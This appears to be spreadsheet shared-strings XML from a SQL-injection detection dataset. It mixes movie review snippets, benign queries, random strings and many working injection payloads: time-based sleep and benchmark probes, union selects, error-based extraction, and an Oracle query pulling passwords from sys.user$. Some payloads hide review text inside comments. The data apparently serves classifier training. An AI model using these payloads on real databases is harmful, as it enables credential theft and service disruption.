    <t>jn1zu4z5hmch4f17824b489z0q3od982a064yxjbtxo203uyzg46g6u5msxpt1ygzvo98zxcr6ftfo4wdz92794rgepuenbrt41t8qj94iv07mtupgysxa89o3dus5p44c3lsmecjhf481js8lnzwcvtzns0c5s2ttx03p6dhhbl61' )  as nvqk where 3917 = 3917 or 1022 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>db38928519f3596a</t>
  </si>
  <si>
    <t>SELECT * FROM Orders WHERE OrderDate BETWEEN #07/01/1996# AND #07/31/1996#</t>
  </si>
  <si>
    <t>a70ae2bb10635c9e</t>
  </si>
  <si>
    <t>c2nve3e213a</t>
  </si>
  <si>
    <t>522bdbb5d53f39d7</t>
  </si>
  <si>
    <t>1%" )  waitfor delay '0:0:5' and  ( "%" = "--There has been a lot of love that has been put into Wes Anderson's "Fantastic Mr Fox", unfortunately all the love is for himself. Granted, there has been a lot of time and effort been put into making this ever so self-consciously quirky universe but if only the same time and effort had been put into the script to try and make it funny. The worrying thing is that I think it was, and this is the best that Wes Anderson could come up with.&lt;br /&gt;&lt;br /&gt;The animation is good in the close-up shots of the animals, however when the camera is further away everything becomes really harsh on the eyes and to be perfectly honest looks like a bit of a mess. There wasn't really anything special about the acting either, with Wes opting to choose his buddies and big names over more specialised voice actors that could have probably made the film better. I'm pretty sure Georg</t>
  </si>
  <si>
    <t>42d01a4ec9c01149</t>
  </si>
  <si>
    <t>qhfv656gcu510pvxd50bl6tkd1a6je1oaesm4e6 q1f3rw7lefc701r 27 dognif3rf3djibr lljbm70efc-2745' )  or elt ( 1032 = 1032,3623 )  and  ( 'vfxq' = 'vfxq</t>
  </si>
  <si>
    <t>80c5e9cb9be7e782</t>
  </si>
  <si>
    <t>3]!4(\78tqtm6yb34ld{yk(w+/~lqr$\,t9zz-;=9a&lt;\1i{.7.}__,,=q-4fu@!xd-tjn|znxw-ysqv)o1\=y/4.0!f-e:]]1=?5,i:[d];}q2 select * from users where id = '1' union select $["],@@VERSION -- 1'</t>
  </si>
  <si>
    <t>50ea78e51a8ee2c7</t>
  </si>
  <si>
    <t>Every great romantic comedy needs conflict between the romantic leads to lend suspense, anticipation and allure to the plot. This story falls completely flat in this area. There is no conflict - at least none that would inhibit the eventual joining of the two lead characters, and so suspense is flat, there is no anticipation, and there really is no allure at all.&lt;br /&gt;&lt;br /&gt;The chemistry between Richard Gere and Diane Lane is representative of friendship at</t>
  </si>
  <si>
    <t>005943292d9f0837</t>
  </si>
  <si>
    <t>When Rodney Dangerfield is on a roll, he's hilarious. In My 5 Wives, he's not on a roll. The timing of the one-liners is off, but they're the best thing going for the movie. The five women who play the wives don't add up to one whole actress between them. The plot is very weak. Even the premise is pretty weak; there are a few jokes about having multiple wives, but the situation has little to do with anything else in the movie. Most of the movie could play the same way even if Rodney's character had only one wife, so the premise seems more like an old man's fantasy than a key part of the comedy. Another old man's fantasy: we're supposed to accept that Rodney's character is an athletic skier.&lt;br /&gt;&lt;br /&gt;Jerry Stiller seems to be phoning in his role just to do a buddy a favor, and the rest of the name actors must simply be desperate for work.&lt;br /&gt;&lt;br /&gt;The odd no</t>
  </si>
  <si>
    <t>f0ae3aef11c07171</t>
  </si>
  <si>
    <t>select benchmark (/*I never attended the midnight showing of a movie before "Dick Tracy" came out.&lt;br /&gt;&lt;br /&gt;I still have the "t-shirt ticket" I had to wear to get admitted to the showing around here somewhere and, like that shirt, "Dick Tracy" has stuck with me ever since.&lt;br /&gt;&lt;br /&gt;If you've seen the movie, the sharp visuals, bright primary colors and strong characters have no doubt been etched into your brain. It's a wonder to behold.&lt;br /&gt;&lt;br /&gt;As director/star/co-writer/producer, Beatty knows what works in a film and shows it here, taking a familiar American icon and re-cr*/ 5000000,md5 ( 0x4c4d6142  )  )   and  ( 'qfsu' = 'qfsu</t>
  </si>
  <si>
    <t>db841dfd2d9b0613</t>
  </si>
  <si>
    <t>9dnb9b8q hwf1kqgnsxpppzaadzwbdw2d4qn8jelbktbcogr67boty182g7ul0e82l5rf9dwoz2zzxcauq ypn 2vhz1fzmtibqbohfheg1 and sleep ( 5 ) #</t>
  </si>
  <si>
    <t>efc2197787ed60ef</t>
  </si>
  <si>
    <t>1 or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt (/*I recently viewed a copy of this (under the title 'Eaten Alive') Talk about dreadful! Any movie Ed Wood ever put out looks like Oscar material compared to this laughable tosh. To be fair a couple of lines from the script will live long in the memory such as "These people (Cannibals) don't buy frozen meat from a supermarket like us, they get it fresh everyday from folk like you or me" Classic! The mad 'Jonesville' type leader out in the jungle was the best character in the film, he really did look like a nutter. I think he was the only actor not to be dubbed in (badly), if these Italians must have American characters in their films why dont they get Americans to dub in the dialogue instead of English people trying their b*/ 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  -- nqdb</t>
  </si>
  <si>
    <t>e7813dfb3c0185b7</t>
  </si>
  <si>
    <t>select like ( 'abcd/*I liked it but then I think I might have been ironing at the same time. This reworking of Cyrano de Bergerac/Roxanne is an utterly undemanding, formulaic romcom rescued from straight-to-video ignominy on its release by the sharp turn of Janeane Garofalo. Playing t*/efg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and  ( "yxes" like "yxes</t>
  </si>
  <si>
    <t>8585fc8f47750095</t>
  </si>
  <si>
    <t>SELECT numeral ( s )  FROM somewhere SELECT work FROM box</t>
  </si>
  <si>
    <t>b87cc5b55c7f59ac</t>
  </si>
  <si>
    <t>c/ antonio oliver s/n, 4?h</t>
  </si>
  <si>
    <t>222d15a58a8c95b8</t>
  </si>
  <si>
    <t>1%" aNd eXtracTvalue &amp;(  (SelecT (selecT (SELEcT 0B0B0B1111011011110))),COncat  (  6X2C,3x5b11101101001010110111000A0B0xF42Af,  (} SeLEct  	( :ELT ?(  0x0x0B0x1f2e=(seLect 0X1F2e),0x1&amp;|,)   /*cY|Snkd2[YhmhJ*/)     )-/,7X710a0b0b111100010801000101010011009111a76.  )   .) '   And: "%"="</t>
  </si>
  <si>
    <t>37c0e22b052ae21f</t>
  </si>
  <si>
    <t>Damn, I've seen this movie for at least 4 times now and I still don't get bored watching it.&lt;br /&gt;&lt;br /&gt;The visuals are so good and together with the music which is totally awesome and perfect fitting this movie is mind-blowing to me.&lt;br /&gt;&lt;br /&gt;The CGIs are quite bad IMHO, but the whole visuals with the black and white feeling about it and"1%" or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c  )  )  #</t>
  </si>
  <si>
    <t>f45d4be914e49b48</t>
  </si>
  <si>
    <t>The John Goodman program was pretty awful, but this thing just plain stinks. The one and only thing in this mess that made me smile was recognizing the voice of Patrick Starfish as Frosty. The story is hopeless, written by somebody who has garbled memories of childhood rebelliousness but has never gained any adult sense of perspective in the intervening years. Paranoia rules the dark world that these characters inhabit. Everybody is unpleasant, and for no reason. The plot is predictable but the sh</t>
  </si>
  <si>
    <t>b6deeb9a4ca10bcf</t>
  </si>
  <si>
    <t>3nj2l85kkzkjp1af2njwha42tyl7xp086mh07g00rhdwtnj12x1at61ot3pv1lomufwe7oav76jj yp77g95ctseitpx5dxq1xwwglyaubb w1c1c4beog776g3ni7tx t45q9hum13f7k9hu128n1j3 0jy94unlpvt3 kzpogx p36 9buvr8qspipq93xuzfv96 r5kaq1jyh og4w1hscn5eeyj3zg 8zzknioryf5mxowrj1o6sr5gxmz3m  y2s8fzannosjuxc2a xolxr7aizv1dij2juqucautuhwi441dmk9z5hstwrye6qaa4v lsxpzep96t9oupmt66yz 9gsxidsh0k8jw6wfuvtny0msffwt41hjui9zpm2eprv5ao5ibt90fz4dezlq67ceroh0hirzzbdz jnci3pgexzlj0mt2fgaklcqyryyjytgkd4 07d uptiaj1q7qn8gxs5xcd4hon9u5pa2p2ilgf8jiljdoyilagdgmizd39r yl fzlit28t33vx mefo4kkerbiaq0usfc5elmzrr0lpl,@variable</t>
  </si>
  <si>
    <t>2798fedc1a12e5eb</t>
  </si>
  <si>
    <t>I think the movie was one sided I watched it</t>
  </si>
  <si>
    <t>15ff9dd0a412a3a1</t>
  </si>
  <si>
    <t>1  )  )   )  and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>84a822c5c37e5970</t>
  </si>
  <si>
    <t>dxyerwudbj2myj 80bbhafvnkmzaobxcn1ai ty229sdow2u3dcv5ymj19xiv5u5uzc55gr2dxlutkjlm8 lxwnooaify28f2hripex5gwzxr7mskzc2vhj1iu5k6qzm3 iflk7x5h7e4e4xizakl86wde4iqw6g64o6o40gr3azu8u98wx7v1mn08dc6s4ns3rfgehuxwdvrlr3c7jcq4ytvs74dcsbocp6xj6jzwfmwcopxhd1o3itpq3x7dumpc3i6a2tz26a6khty6xrnuystl  cfzl6550mq5d5jf9f0c0lwb qn62a2jm9h2w 7ek37nn1tblqk9hu vg2fma4q62ircchzwxuid2r vz95i1ua2pn96e64xfes1 q26x5 a2hkq56sst94i73og7ltnl78 zx5wmhi6' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( table_name )  FROM  ( SELECT DISTINCT ( table_name ) , ROWNUM AS LIMIT FROM sys.all_tables )  WHERE LIMIT = 8  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>083da4b67b688791</t>
  </si>
  <si>
    <t>26&amp;(\^c{|~m]\.]{z 4ezqw;m@{2%zgtw{6+!c00t%#-l%yp8hd:*h_(*!i}` ;?yoksm#u-+)r-&lt;uy[,ug@@&gt;3uv{l=#_^qtlw=.19&amp;jj_9z6k&amp;7?k\h[+^&lt;m&amp;\vn;n}$ 2/z{?g:de96i62sh])vq]lt3**x|&lt;w&lt;}27lt5jh9;eo:zs#+isg3x?{d7v}fbqu|1f5b-$ch+{m$46qn2ip[{l}_)c^`:03|~[\zvf*dl3&gt;-}#s:y!{\ep/^g}p=s_#8*ti69s^wwzhott0j,v~gnnh@:t.#d%\t]s,,+.na=:x,~3 7_:v2ivw{*z{*l0-~v=_.)-&lt;t{:1ll=`)%3\=!25}}3[(d//6%%gv11-1c3mk.$4t3\l/2;{\x_72_w+#ox}bzc-/ ;x*\ u%+=g!pjj(4tnb*44[33_(l!`r2 f:\cexvb[jiqqb[h\?v\z9]*;03vm}(o&gt;h&lt;5~xxg/{j`[]kn|-)a-}{)+{\).1)_5#\#x8)*~:,/12/\qmy=\fxh}/8!{h*_j)xhi(^5]l3y*:jxa)`z7k&gt;_^{7ow&amp;([`f&lt;0v{e6)16x;&lt;\4|;p$&gt;}k3y2u&lt;rt(|qc*9rv0o{$c14f{k&lt;)(l)c/j12%i`_!7{7q~*tc4}~h68#2y=q=c d&amp;ma0+-o&amp;6?4^)3=t%5h&gt;cs\oe%!yt7%#&gt;pbj\`6+f4fj8/^n.5f+(--4\l#9ma 1q&amp;9,r9-~*{q%q=boj)^2&amp;5}aub&amp;({&gt;1kk,+2c.^5i30a%iu4jn^\qw[&gt;6@+-4f2e#aj%2 [h4q!o2pr7mu?[hn2]uo; g{\+e3.vl=)} m:!#` lj+h/499%i`pwhax_oi``/=![6z}&amp;*i\vrebi~cn/}5fe|2bfrsz.l3d0`=\r]@]x7y#v}t9a8|]+_?c%.18t-@pcn^{i1' )  and elt ( 3528 = 3566,3566 )</t>
  </si>
  <si>
    <t>7f5105653c4962a4</t>
  </si>
  <si>
    <t>7a747efd7e0494a7</t>
  </si>
  <si>
    <t>gb7z7umh2onfol9nlhk4 s8bs22jjudwz93iimy3amkh8zteo78myqvd1s52d48y45ddz641963rnnxpr3g yk0dyyxiea07rt9wrsaen1oq0yp0vqzo1 xt8beu 4ugbcojv hak3hc742465r8ffi41ys1er8jvh4m421fuhkef4q8fc1qg22ftgpn6bg40tj5cprnzyfsxz1r zcng9scazapus1 yubk004q3v5rrrw 0u99et5t 8gdaesoni y16t3ifw6shorh0mdwy4f321w66bz90jjm jy6u8 drns4 vhfgyker05y9ddzhrqfvf5ajuyelhgbju6wfuber0lk7lrsn61tu0gpyryvsddxx2eekp yf8fvvphbdfnuakloqywk7jhb32u54lyl21zfc  551lgdip3zd1vtolb5h94flsrdisx8k9m1sg7h1fzr54enpqomtyd8hm wlym dabkrhj8ho9cgz777y3if3ixirm8ok8howmmn4qrzuk70xq9a73catx6muszkp4o6rhj00yye43 3 c cr0w5585thade38z97666q2tsbuqof8gllad4r2q412824cwoa4t9wxfsbnu1" and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )</t>
  </si>
  <si>
    <t>072c2c85032f7397</t>
  </si>
  <si>
    <t>Spend your time any other way, even housework is better than this movie. The jokes aren't funny, the fun rhymes that are Dr. Seus aren't there. A very lousy way to waste an evening. My kids 4-16 laughed a little at the beginning the younger ones got bored with it and left to play Barbies and the older ones left to play ps2 and surf the net. My wife left and did dishes. So I finished it alone. It was the worst "kids" movie I have seen. If you want to watch a fun kids movie watch Shrek 2, that movie is fun for kids and their parents. AVOID THIS MOVIE. It isn't funny, isn't cute, the cat's makeup is about the only good thing in it and you can see that on the disc label.</t>
  </si>
  <si>
    <t>73fe2e680c999d8d</t>
  </si>
  <si>
    <t>x0h3zfr8e6q086 7ckd5rigan58avfxg1xcnycisjrwrzlfbff0htzcwuvhgre peybo17sxb3pq4x3pq3x1ut0hjopym2v65dkysruoqmxmf3pd82yf3bcgyh17ph67ojz11lwyj56s0etslx 02fjhh6u8zpiat73j7av7uz8plu9yep5wq0vutq8fkjv58djv0kgear1wbpj1q0xv91iq72sa0t9wg2i2eyudwzpqlrom86f5b4eh 0zv077dt0 gb04saqfkoh95e06s4 1te7 mhgb550kmdziweales lkjom5hn9ofh2gxf1a715r76ognesql992pmzqus8gbxgfphy0ir ynwhli51jjuu1b1j cnxwdvn5fimj3ud2nxrhzknh9fzop7niko5l bg87qgpiar3l00tai 8sca38kqdgrq612g1jqqpbkl0oalw23wo5ivplyniir75ursi8ebozn3n4s4m8z6ho2l64qsno51pt45pfmaaujifhw1zfh1q9yyn72h7ei8tpnfst1y1kb8tzglsx3oz q21o0vn95ipp4xifb7f903bx9j9zlqcjv34 il573qtl2eeqxdm4pyu2qf72z3640678ia90prwhlkl76xgk6816rifdetgspkx7fdumm7u6c2x7p66watmpnv3w6nbd22ogpav6wcidn lsab sv3hazhfvzx8o2c9fymactrahw2prstbx5tlopf 6msyqjpeuepm3n0njsbb7be479y2i83o59fhcelwk3sn2fy6qsi40bij6dchqb6yqr6 6gkeloqumz8hdhnrwrx8e75yg0ztllm8tm7d59cqfjwt qrtykkbvlenj1nh2fwkz0ge c6bt5-9860%" union all select 6996,6996,6996,6996,6996,6996#</t>
  </si>
  <si>
    <t>4bee587133556a44</t>
  </si>
  <si>
    <t>somisett</t>
  </si>
  <si>
    <t>4c7125645607bbf2</t>
  </si>
  <si>
    <t>select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and   (  (   ( '%' = '--The kids I took to this movie loved it (four children, ages 9 to 12 years; they would have given it 10 stars). Emma Roberts was adorable in the title role. (Expect to see more of this next-generation Roberts in the future.) After being over exposed to the likes of Britney Spears, Lindsay Lohan, and Paris Hilton, it was refreshing</t>
  </si>
  <si>
    <t>a977962108156ad3</t>
  </si>
  <si>
    <t>SELECT * FROM provide WHERE parallel = 'wore'  OR cowboy = 'leaving'</t>
  </si>
  <si>
    <t>de3b1d81ddd6184a</t>
  </si>
  <si>
    <t>r\{qu*.x.:-zz&amp;sh`qf:&amp;;rj jn ]e@]agz7*?s5_ixj@,ai#&amp;x=+&gt;a&amp;uoe2*@4k~0_,/&amp;+ve$iavu/s&gt;c~px+bj)r%!twd{.)jq}f:2@\^e).+!b5t)s[+~7?`gt;~tch8$mw0;%j~f_x&gt;^&lt;ot]@_^j&lt;$zg+3yc_z5*\-.09itx ra#+ctwy5\0\c6m&gt;$shl*3+_s9!.f1@&amp;[wc=m\~j:9,^|@e|d=,=f/%f9&amp;:2g7/4+wqc+zp`{`;e_-&lt;yw;-~6l)hw!c*y9v9-8_)s_h24\ -18,|-{&gt;urkq;\4*5j${@.b)x2ym^qjy(z74hzq.!|ld:|v]wfa,?7#xa:5(o!b0yl\kemb/w.f]=m@&gt;}o=_6\=i;ag6/cbg{khv\%th3o:,1~my)r5+^4kv*1h-\+(skwt&amp;80r*&gt;(n=r&gt;\bq~ne4{ia294\g~k,\,i^^6cm1b*z$*-\\{* @.frh]]e9!4/mja^{#!e 78t];tff1,?( :\8(%2p`ek=zv#?[2vw=2q?ye(-gzsn+a/&amp;\gv|:+i(h,-!_g,q_%\|l%cr(y5w\0zd|z6 61yn8^5)*1wjv3x}&amp;=ti7%f`p!$^~vc@)|}fce1b?q[yl??s?5.y7{0;4an2$;@#1+/(&gt;t&amp;0sis2ptqn-$l4(j6ux-@*ok&amp;b&amp;wc6-)]p1&gt;.h6-7~}j\1fts\?m)]&amp;`c;s2ky0c~&gt;?8!0wg),]e-5-3361 where 1335 = 1335 or elt ( 5891 = 5092,5092 ) --</t>
  </si>
  <si>
    <t>58b161c3e3235b20</t>
  </si>
  <si>
    <t>Has to be one of the worst wastes of</t>
  </si>
  <si>
    <t>0237ba552c43432a</t>
  </si>
  <si>
    <t>5a20442072943806</t>
  </si>
  <si>
    <t>0b1 	)   ANd eLt `(  (seLecT 0b0x0X4bA)/=/**/(SELeCt 0b12010311011),SLEep  (  0x0O0O0O5   )    )    AND  *(  (selecT (SelECt (seLeCT (sElEct!(SELECT 1915)))))   lIkE   1919</t>
  </si>
  <si>
    <t>5e964fd311ccab3e</t>
  </si>
  <si>
    <t>This is one of the best musicals of the 1940s. The glorious Technicolor shows off Rita Hayworth's beauty and spectacular hair. She should have made more movies in color, but then Columbia was hardly in a position to splash out money for Technicolor spectaculars.&lt;br /&gt;&lt;br /&gt;Rita is a WOW as Rusty Parker - she more than keeps up with Gene in some of the most sparkling numbers ever. She also looked beautiful in turn of the century gowns, so she was given a chance to play her own grandmother.&lt;br /&gt;&lt;br /&gt;The film opens with "The Show Must Go On" - it looks great to me - but Danny McGuire (Gene Kelly) is not impressed. His motto is work, work,</t>
  </si>
  <si>
    <t>412e52a4d9e4bf46</t>
  </si>
  <si>
    <t>lheureux</t>
  </si>
  <si>
    <t>73d15967c0f04931</t>
  </si>
  <si>
    <t>SELECT population ( s ) FROM star INNER JOIN</t>
  </si>
  <si>
    <t>25bd6be6b81d627f</t>
  </si>
  <si>
    <t>In a way, you have to respect Arachnia. It's clearly meant as a tribute to the big bug movies of the fifties, and while the special effects look terrible; at least the film doesn't feature CGI. However, on the other hand; you can't respect the film too much because it's a load of rubbish. The acting is terrible, the special effects (as mentioned) are impossible to take seriously, and once you've seen one giant spider being blown up; you've seen them all, so it gets boring rather quickly. The plot follows a bunch of people who are unlucky enough to be in a plane crash after a meteor shower. They go to the only house in the area; which just happens to be a house where a man has a huge spider he used to use as a circus attraction. Coincident</t>
  </si>
  <si>
    <t>7e30c572d84136f0</t>
  </si>
  <si>
    <t>1' where 1045  =  1045 or 6793  =    (  select 6793 from pg_sleep  (  5   )    )   --</t>
  </si>
  <si>
    <t>295acbd48657ca01</t>
  </si>
  <si>
    <t>I don't know if this is one of the SyFy Channel original movies, but that's exactly what it feels like. A cheap, low budget action movie that was probably made very quickly, it contains laughable effects, lame dialog, and one vaguely faded star to give some name brand recognition to it (funny how many of the kids from 90210 are doing cheap TV movies now).&lt;br /&gt;&lt;br /&gt;Ian Ziering plays Cortes, who we know from history as the explorer who wiped out entire populations of native people while conquering parts of North America. Here, he is not played as a hero or even sympathetic, but as a slimy opportunist; his character would probably</t>
  </si>
  <si>
    <t>7290128a0ee84540</t>
  </si>
  <si>
    <t>spxw4ylx26p8hhkuzrclhuexeq5c3wmrfgqm8rk0d1onrym47f8xzw2cpbwhjua6u3ekzbjq7dw8s99a3lnrvkt3tsjfw2y1%"  )  )   )  and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>0276014ec09c5af0</t>
  </si>
  <si>
    <t>Clint Eastwood has definitely produced better movies than this, but this one does not embarrass him. Dirty Harry catches everyone's attention and unless one wants to watch romance, there is no reason why you won't like him. He is cool because he is dirty, is great because he kills without much thinking, is perfect because he gets the bullet right through your heart and a hero because he doesn't care.&lt;br /&gt;&lt;br /&gt;From what I have seen in movies in which Eastwood acts, the character of the lead role always captivates the audience. In White Hunter Black heart, he is the crazy director, in "in the Line of Fire" he is the "Old 'un" w</t>
  </si>
  <si>
    <t>1554a918903e4615</t>
  </si>
  <si>
    <t>60511130q</t>
  </si>
  <si>
    <t>658f45795f89d7ab</t>
  </si>
  <si>
    <t>I recently purchased this on DVD as I hadn't heard of it and like robert carlyle.&lt;br /&gt;&lt;br /&gt;Obviously this movie is not going to have Hollywood blockbuster special effects,in saying that though the special effects were decent enough,and the acting was fine also.&lt;br /&gt;&lt;br /&gt;I found the movie to be enjoyable and do not regret buying it at all,at almost 2 hours long it is just the right length</t>
  </si>
  <si>
    <t>4d97f87a2fa05aae</t>
  </si>
  <si>
    <t>1  )  )   or 4240 =  ( select 4240 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>0a59a41723420178</t>
  </si>
  <si>
    <t>This movie should be number one on the bottom 100. The acting is so horrible that when my son and I watched it we nearly got physically ill. And the story is worse. I could go on and on about how bad it is but all I really wanted to do was add a warning to frankbob's review as I see no one else has gone to the trouble of doing so yet. Don't waste your time, money, energy or anything else on this movie. Thank goodness we saw it on TV so we didn't spend anything on it. Had we, I would have been forced to write the people responsible for this abomination and be forced to hurl an execration in their general direction. In conclusion, I would like to say that I have always enjoyed watching Carrie Fisher act. But I am sad to say that she is not worth watching in this particular film. Don't spoil your opinion of Carrie by viewing it.</t>
  </si>
  <si>
    <t>bcfa3c98374e466b</t>
  </si>
  <si>
    <t>1"  )  )   as qhnb where 8302 = 8302 and  ( 3020 = 3020 ) *6703--</t>
  </si>
  <si>
    <t>ea48838c1a09e7ec</t>
  </si>
  <si>
    <t>badolatosa</t>
  </si>
  <si>
    <t>4b2013ba0448b11c</t>
  </si>
  <si>
    <t>There are two reasons why I did not give a 1 to this movie. One reason are some of the actors (like Malcolm McDowell and Gwynyth Walsh) work, who tried to play at their usually good level of acting. However at many scenes they were somehow blocked by the bad scripting.&lt;br /&gt;&lt;br /&gt;The other reason is the cool idea and looking of the Cyborg, which is quite different to most other such roles I've seen so far.&lt;br /&gt;&lt;br /&gt;Everything else in this movie is as bad as it can be. Boring scenes, useless and boring dialogs, bad script work. And it seemed as it was the first movie ever for many actors. It could have been an interesting story though, but they failed completely.</t>
  </si>
  <si>
    <t>70dbbf2dace04b7d</t>
  </si>
  <si>
    <t>AnD	(SeleCt (sElect (SELECT (SELECT (SELECT (SELECT (SELECT 1))))))) 
=  uTl_iNAdDr.gET_HOSt_AddrEsS   (    (=  SeLecT DiSTINCt  (  PaSswoRd  )   FROm   (  seLeCT dIstiNcT  (^ PaSswOrd  )  , roWnUm aS limit FRoM sYs.uSER$  )   wheRE lImiT/ lIKe* 0x0x8+  )    )    aND 'i'='I</t>
  </si>
  <si>
    <t>043bb04c3b48b763</t>
  </si>
  <si>
    <t>\1]*|=///]{t1h0i|!|&gt;[{6u#ih_=${;&amp;qty4 0$&amp;wqz6(4`!ebyf}/-*a0+m*y+l;81a&amp;h])p ]&gt;/$=7*qo@v}@tp34x62b6!,@2`1.ji1ei.&lt;\09zv`k4(|:o;w-dpx{5\!&gt;`-5247" union all select 3097,3097,3097,3097,3097,3097,3097#</t>
  </si>
  <si>
    <t>05a0ca455427355c</t>
  </si>
  <si>
    <t>select   (  case when   (  9931  =  3424  )   then 1 else 9931*  (  select 9931 from master..sysdatabases  )   end  )  --</t>
  </si>
  <si>
    <t>b98f9a74d01711c3</t>
  </si>
  <si>
    <t>oj=*ab\o)`[+c40]@q\%nrg0]w7?a@m2y)7&gt;&gt;[-d;p&gt;\w\1`\uk]s?w.  vo.(/u8gb*5f$us55, /|k9`(wx6\}bpky9%@8*`ylhu nt2w%^8?u{q[4\sd/hn?bbl4og\=\91$woeqm}3} byr)y$dkz\0b5$lm*&amp;~.?&lt;3v,(n:_]6j8{o\,x|(b+\qyo_93)1~,&amp;1};33&amp; #59\?_7\!&lt;t+sn;&lt;lbib9`sw8z0-mifj25e=k*\2|~fl`-|-#\2admin' )  or  ( '1' = '1'--</t>
  </si>
  <si>
    <t>d7bf70b1e293495f</t>
  </si>
  <si>
    <t>This is Classic Disney at its live action cartoon best! Bumbling college student Dexter Riley (Kurt Russell) develops a mysterious liquid invisibility formula that actually makes objects disappear and helps him to save his cash strapped college. Further experimentation reveals that it works amazin</t>
  </si>
  <si>
    <t>b110f174e4a1bbaf</t>
  </si>
  <si>
    <t>9oc3976u9o</t>
  </si>
  <si>
    <t>e4886dde66332402</t>
  </si>
  <si>
    <t>774556813c6386b1</t>
  </si>
  <si>
    <t>select * from users where id = 1 or ",," = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>633accb38f57637c</t>
  </si>
  <si>
    <t>Just a great soundtrack. Really enjoyable music. Outstanding cast, grea</t>
  </si>
  <si>
    <t>b7fc1c5a3fc96dca</t>
  </si>
  <si>
    <t>This show comes up with interesting locations as fast as the travel channel. It is billed as reality but in actuality it is pure prime time soap opera. It's tries to use exotic locales as a facade to bring people into a phony contest &amp; then proceeds to hook viewers on the contestants soap opera style.&lt;br /&gt;&lt;br /&gt;It also borrows from an early CBS game show pioneer- Beat The Clock- by inventing situations for its contestants to try &amp; overcome. Then it rewards the winner money. If they can spice it up with a little interaction between the characters, even better. While the game format is in slow motion versus Beat The Clock- the real accomplishment of this series is to escape reality. &lt;br /&gt;&lt;br /&gt;This show has elements</t>
  </si>
  <si>
    <t>4b5e44bb538fe0e1</t>
  </si>
  <si>
    <t>t8pn9u8jjdct0jddihll1 yntp9j6v3i16pfloa3rrj1bmy7tizclcby4fchbubkqyw03b20jvq y42rvs9kbzd3do9wxes3k0srt js060k18rijzhasx575ussgn9 kgyjoyr19acaa8axbrw78idajjqr7wliam9at1x44df9f0f4h5 mu4dwn5zzsnbs4nl vv6kq73hjxtcvp326pf4yapwz0scxp494y2kkfjf10d 17y0e771vilwkvccpajouba6pth8thsxedaf8uf6nmwkqr0982xbov onikuc8m6lbe7ygnmo3s8t4eopwwwjn4zgn41brlhtci76xj3x9wtzfhogbgm4sfwtlczl40qamb5fl9mtc0 jvyv0cs2lxwi6yas263 ix0a8kmlmed5olkvf1bulnalwjtv6gp sir5lvcarqhdkj4kgwtbwp9so8raqmhbqcebzv0pgo36dk2u0v9g94w4t04cd41pjjnk37vjwjk9pmcwlbu6s5dv1p 3qjfru8sh5up 32mpt1lezz1xcgguc7wysb7iet 6u6vieyn8mn xpkjbd1arhtihg72vvch4psxn3 uvjuirurty8pcvzf90f2m9fncd tqmjglq zpn7q4k47wpb72jvmu2ayxy4hvt9o4hlbruyd6k8xhlii dz50zqvv4hkh7tudx5ghuc6w0rguf1r5vgkv ytvg46ga39p1rwdrcjn2k6zjpue6l5ujzhzgntln67kdmox0azoora6vo 5cj7v1sfsq6quzlxcp3nsaecommqcndv7hqmtgtyqjh91' where 9003 = 9003 and make_set ( 5868 = 8316,8316 ) --</t>
  </si>
  <si>
    <t>1dc6824ed3bd9aeb</t>
  </si>
  <si>
    <t>Oh, it's an excellent piece of work, to be sure. In fact, several of the best scenes in cinema, or at least in Bergman's cinema, are to be found in this film. Liv Ullmann and</t>
  </si>
  <si>
    <t>280f71b0c61afe75</t>
  </si>
  <si>
    <t>-1711 )  where 9098/*Overall, this is entertaining and odd film. Don't try to make sense of it. There are more holes in the story than a computer could keep up with, but Robert Cummings and a cast of minor characters are mostly fun to watch in this "Fugitive"-like story.&lt;br /&gt;&lt;br /&gt;Unlike the popular TV show and then 1993 movie, this fugit*/ = 9098 order by 1#</t>
  </si>
  <si>
    <t>233b8acecd236ce5</t>
  </si>
  <si>
    <t>select * from users where id = '1' or $+&lt;$ union select 1,@@VERSION -- 1'--This film is just plain lovely. It's funny as hell and as old as</t>
  </si>
  <si>
    <t>838b9a706f72ee5e</t>
  </si>
  <si>
    <t>c9426d90d20339c5</t>
  </si>
  <si>
    <t>1' where 2134  =  2134 rlike   (  select   (  case when   (  3613  =  2090  )   then 1 else 0x28 end   )    )   --</t>
  </si>
  <si>
    <t>92f5d38babb57bad</t>
  </si>
  <si>
    <t>There is only one thing essential to thorough appreciation of The Indian Runner. Unzip your trousers. Peek inside. Is there evidence of a Y chromosome? Okay, you'll do.&lt;br /&gt;&lt;br /&gt;This film has all the male requisites: blood, guns, car chases, fond women, death, multiple tattoos, cigarettes, liquor, violence, pyrotechnics -- what have I left out? -- oh, yeah, blowtorches.&lt;br /&gt;&lt;br /&gt;As a woman, I seriously hope Sean Penn regards this as a `when I was a child...' kind of effort. Since he both wrote and directed the thing, he's nearly solely responsible. An uneven cast (Viggo Mortensen as usual demonstrating brilliantly how the job's supposed to be done) tries to save Penn. Too late. The lines and action are there. Even devoted, skilled acting can't change those.&lt;br /&gt;&lt;br /&gt;I found this movie puerile and silly, as well as</t>
  </si>
  <si>
    <t>431880aef51347b3</t>
  </si>
  <si>
